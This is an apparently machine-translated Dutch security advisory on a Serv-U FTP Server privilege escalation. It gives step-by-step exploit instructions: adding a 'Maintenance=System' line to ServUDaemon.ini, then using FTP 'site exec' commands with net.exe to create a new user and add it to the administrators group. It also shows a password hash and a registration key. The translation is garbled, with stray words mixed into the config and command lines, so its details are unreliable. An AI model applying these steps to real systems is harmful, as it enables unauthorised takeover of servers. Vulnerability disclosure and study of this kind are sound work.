Lokale verhoogde privileges: Ja
Remote verhoogde privileges: Ja
Gebruik randvoorwaarden: Serv-U-profiel op een aangepaste machtigingen
Disclaimer: Dit is alleen maar een privilege escalatie ideeën en methoden.
1, de getroffen software
Serv-U FTP Server 4.1.0.9 (en alle eerdere versies)
Ten tweede, het getroffen systeem
Alle versies van Microsoft Windows Server 2003
Alle versies van Microsoft Windows XP
Alle versies van Microsoft Windows 2000
Alle versies van Microsoft Windows NT
In de derde plaats review
Serv-U FTP-server om RhinoSoft geproduceerd Sserver een ftp-software, die nu op grote schaal gebruikt in de hele wereld. Nadat ik gevonden, Serv-U FTP-server configuratie die opgeslagen bestand in de Serv-U FTP Server file directory ServUDaemon.ini bestand. Als de lokale gebruiker met beperkte rechten of een aanvaller op afstand de algemene bevoegdheid om toegang tot het dossier en zorgvuldig het dossier van de inhoud van de structuur ServUDaemon.ini Ftp proces kan het systeem gebruikt om willekeurige commando's uitvoeren met systeemrechten hebben.
4, defect analyse:
Serv-U FTP-Serve zal de gebruiker informatie over de configuratie wordt opgeslagen en later ServUDaemon.ini bestand. Inclusief de gebruiker recht op informatie en toegang tot informatie naar de directory. Lokale beperkte gebruiker of een aanvaller op afstand te lezen en te schrijven, zolang Serv-U FTP Serveer de file directory, kunt u wijzigen van bestanden in de directory ServUDaemon.ini Ftp proces van realisatie van de afstandsbediening, de lokale systeembeheerder privileges naar FTP uitvoeren van willekeurige commando's. Versie van het besturingssysteem en niet onderhevig aan de gevolgen. (User Info Selecteer "opslag en het systeem register" zonder dit defect geraakt)
5, testmethode:
1, de lokale test
Stel dat een lokale gebruiker met beperkte rechten kan de Serv-U FTP Serveer de file directory te bladeren. Zoek ServUDaemon.ini bestand. Kladblok gebruiken om de algemene inhoud van het originele document te openen:
[Global]
Versie 4.1.0.0 = / / Serv-U FTP Server versie nummer
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMEINEN]
Domein1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 bestand / / host-IP en domeinnaam, haven voorwaarden
[Domein1]
User1 = zihuan | 1 | 0
[User = zihuan | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c: / / kunnen bladeren in de directory
TimeOut = 600
Access1 = C: | RWAMLCDP
Als ServUDaemon.in bestand als volgt gewijzigd:
[Global]
Versie 4.1.0.0 =
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[DOMEINEN]
Domein1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Domein1]
User1 = zihuan | 1 | 0
[User = zihuan | 1]
Password = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = c:
TimeOut = 600
Onderhoud = System bestand / / Permissions type
Access1 = C: | RWAMELCDP
Het bovenstaande, meer dan de originele inhoud van een "Onderhoud = System" save na het bewerken. Maak dan gebruik van de FTP login aan de SERV-U FTP Server na de uitvoering van het volgende commando:
ftp open IP-
Aangesloten op ip.
220 Serv-U FTP Server v4.1.0.0 voor WinSock klaar ...
Gebruiker (ip: (none)): id file / / input van de gebruiker de structuur
331 Gebruikersnaam ok, stuur volledige E-mail adres als wachtwoord.
Wachtwoord: het wachtwoord bestand / / wachtwoord
230 User aangemeld, gaan.
ftp cd winnt bestand / / in win2k de winnt directory, als het WinXP of Windows Server 2003 moet de Windows-map te worden.
250 Directory veranderd / WINNT
ftp cd system32 bestand / / in de map system32
250 Directory veranderd / WINNT/system32
ftp quote site exec Net.exe gebruiker zihuan ziHUAN / add file / / gebruiken systeem Net.exe bestanden plus de gebruiker.
200 EXEC-commando succesvol (TID = 33).
ftp quote site exec Net.exe localhost beheerders zihuan / add file / / upgraden naar super-user
Deze stijging in het lokale systeem, een wachtwoord voor de zihuan: ziHUAN super user. Kan ook rechtstreeks quote site exec Net.exe localhost beheerders gebruiker / opdracht toevoegen aan de huidige gebruiker te upgraden naar de super user groep om te gaan. Natuurlijk kunt u een commando uit te voeren op het systeem.
Verklaring:
Boeken alleen het beschrijven van de mogelijke veiligheidsproblemen, de auteur en hackers X Files magazine dit beveiligingsbulletin is geen enkele garantie of verklaring en belofte. Aangezien de verspreiding van het gebruik van de verstrekte informatie in dit artikel, op grond van een directe of indirecte gevolgen van het verlies door de gebruiker ik verantwoordelijk ben, doet deze auteur geen enkele verantwoordelijkheid voor deze. Auteurs hebben herziene dit beveiligingsbulletin en interpretatie. Voor dit artikel, gereproduceerd of overgedragen worden, om de integriteit van dit artikel, met inbegrip van het auteursrecht en alle andere inhoud te verzekeren. Toegestaan zonder de auteur niet kan wijzigen of te wijzigen van de inhoud van dit artikel aankondiging.